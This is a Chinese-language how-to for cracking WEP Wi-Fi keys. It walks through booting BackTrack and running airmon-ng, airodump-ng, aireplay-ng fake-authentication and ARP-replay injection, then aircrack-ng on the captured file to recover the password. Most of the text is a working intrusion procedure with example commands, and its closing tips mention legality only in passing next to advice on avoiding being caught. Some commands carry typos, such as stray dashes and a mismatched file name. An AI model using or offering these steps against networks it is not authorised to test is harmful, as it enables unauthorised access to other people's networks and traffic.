破解任何加密需要知道几件事情。首先要知道有一个加密方案。其次必须知道加密如何工作。这里是使用数据包嗅探程序做法。
1、使用 Linux。 Windows 无法嗅出 WEP 数据包,但你可以使用 Linux 的启动 CD 。
2、获取一个数据包嗅探程序。 BackTrack 是一个常用的软件包。下载 ISO 映像,并刻录到启动 CD / DVD 。
3、启动 Linux 和 Backtrack。使用启动 CD / DVD 。
注意,此操作系统是不需要安装在硬盘驱动器上。这意味着只要你关闭 Backtrack,所有数据都将丢失。
4、选择一个启动选项。开机后以下 Backtrack 屏幕会显示。用向上和向下箭头键更改选项,并选择一个。本教程将使用第一个选项。
5、通过操作指令装载图形界面。在这个选项中,Backtrack 由操作指令启动。键入:startx 来继续。
6、点击左下角的 “终端”按钮。这将是第五个选项。
7、等待 Linux 命令终端打开。
8、查看你的无线局域网类型。输入下面的命令:“ airmon-ng ”(不含引号)。你应该在界面下方看到类似 WLAN0 的字样。.
9、获取所有接入点所需的信息。输入下面的命令: “airodump-ng wlan0”(不含引号) 。你应该得到三件事情:
BSSID通道ESSID (AP 名称)下面是本教程的情况:BSSID 00:17:3F:76:36:6E1 号通道ESSID(AP 名称)Suleman
10、输入下面命令。这一次将使用上面例子的信息,但你应该输入自己的。命令 airodump-ng -w wep -c 1 — bssid 00:17:3F:76:36:6E wlan0” (不带引号) 。
11、允许设置开始。
12、打开一个新的终端窗口。键入下面的命令,你自己的 BSSID ,通道和 ESSID 值替代。命令: “aireplay-ng -1 0 –a 00:17:3f:76:36:6E wlan0” (不含引号) 。
13、打开另一个新的终端窗口。键入以下命令:“aireplay-ng -3 –b 00:17:3f:76:36:6e wlan0”(不含引号) 。
14、允许设置开始。
15、回第一个终端窗口。
16、让此窗口中的数据达到 30000 以上。根据接入点的无线信号,硬件和负载这将需要 15 至 60 分钟(或更多) 。
17、转到第三终端窗口,然后按 Ctrl + c 。
18、拉出目录。键入以下命令:“ dir”命令(不含引号) 。这将显示在解密过程中保存的目录。
19、使用.cap 档案。这个例子中是以下内容“aircrack-ng web-02.cap”(不含引号)。如下图所示的设置将启动。
20、破解 WEP 密码。这个设置完成后,就可以破解密码。在这个例子中,它是{ ADA2D18D2E } 。
提示
有关网络安全的法律各地不同。确保你知道你需要知道的,并准备面对你的行动引起的一切后果。许多嗅探程序,诸如 Wireshark(以前称为 Ethereal ),AirSnort 和 Kismet,提供嗅探程序源代码。你需要有一些使用 Linux 或 Windows 源代码编译的背景知识来使用 Airsnort 或 Kismet。 Wireshark(Ethereal )自带安装程序,或者你可以下载源代码。你可能找到大多数已编译的程序。一定要小心,你的目标是谁。走进当地的麦当劳,尝试并破解其密码是不聪明的。你被抓的机会增加 10 倍。在道德允许范围内使用该信息。滥用这些信息在本地和联邦可能是非法的。你需要一个特定的与正在使用的程序兼容的无线网卡。
